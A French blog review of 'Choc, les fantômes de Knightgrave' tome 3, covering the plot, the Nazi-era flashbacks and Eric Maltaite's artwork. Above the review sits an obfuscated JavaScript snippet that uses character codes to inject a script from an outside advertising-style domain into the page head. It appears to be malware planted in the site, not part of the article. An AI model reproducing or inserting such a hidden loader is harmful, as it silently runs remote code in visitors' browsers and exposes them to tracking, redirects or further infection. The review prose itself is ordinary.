Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Toujours un effet Choc

     Choc, les fantômes de Knightgrave, tome 3, Stéphane Colman (scénario), Eric Maltaite (dessin et couleurs), Cerise (couleurs). Editions Dupuis, 88 pages, 16,50 euros.

    C’est par un sacré choc que débute ce troisième et dernier album révélant la biographie de l’incontournable méchant de la série Tif et Tondu. Nous sommes en avril 1955, Monsieur Choc est mort, noyé à Istanbul à la suite d’une course-poursuite avec la police turque qui s’est achevée dans le Bosphore. La police britannique en charge du dossier peut fêter l’événement après avoir assisté à l’enterrement du fameux malfaiteur (en compagnie de Blake et Mortimer, pour l’anecdote visuelle !). Mais l’inspecteur Fixchusset reste dubitatif. et si tout cela n’était qu’une nouvelle mystification ? De fait, il se fait rapidement enlever et se voit soumis à un interrogatoire par un mystérieux homme dans l’ombre, masqué par ses lunettes.
    En parallèle, et en flash-back successifs, la suite de la jeunesse de Choc se déploie, non sans surprise, dans l’Allemagne nazie…
    Aboutissement d’une belle trilogie, ce dernier tome ne déçoit nullement. Happé par l’entrée en matière effectivement très “choc”, on suite ensuite Eden dans l’entre-deux guerres, accompagnant son ami Ange dans son trafic avec les nazis et croisant même Hitler, avant de devenir espion pour les services secrets britanniques et d’être victime d’une explosion qui va justifier définitivement son passage sous son fameux heaume. Un jonglage temporel brillamment maîtrisé et qui relance à chaque fois intelligemment le récit.
    La première rencontre entre Tif et Tondu avec Monsieur Choc, dans la série initiale.

    Touche finale, les auteurs mettent en scène, la première rencontre entre Choc et Tif et Tondu (dans le tome 4 de la série initiale, Tif et Tondu contre la main blanche). Belle manière de boucler la boucle.

    Côté dessin, le travail d’Eric Maltaite (fils de Will) est toujours aussi remarquable, dans un style plus réaliste que celui de son père, mais l’ambiance beaucoup plus sombre de cette trilogie le justifie pleinement.
    On déplorera juste un épilogue un peu trop appuyé et inutile. Mais pas de quoi  diminuer le plaisir pris avec cette trilogie qui n’avait rien d’évident au départ. Et ce Choc plus tragique, plus adulte et plus déchiré devrait permettre une nouvelle lecture des albums de la série.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Kris, une Somme d’écriture sur 14-18

    Kris, scénariste d’Un Homme est mort ou de la série Notre mère la guerre ...

    Danse macabre avec Céline

    La cavale du Dr Destouches, Christophe Malavoy (scénario), Gaëtan et Paul Brizzi (dessin). Editions ...

    Un beau clair de lune mécanique

    Descender, tome 2: Lune mécanique, Jeff Lemire (scénario), Dustin Nguyen (dessin). Editions Urban comics, ...

    Tout ce qui ne tue pas rend plus mort

    Zombies néchronologies, tome 2: Mort parce que bête, Olivier Péru (scénario), Arnaud Boudoiron (dessin). ...

    Le dessous des cartes de la colonisation de la Florida

    Florida, Jean Dytar. Editions Delcourt, 264 pages, 27,95 euros. 1572 à Londres. Eleonore et ...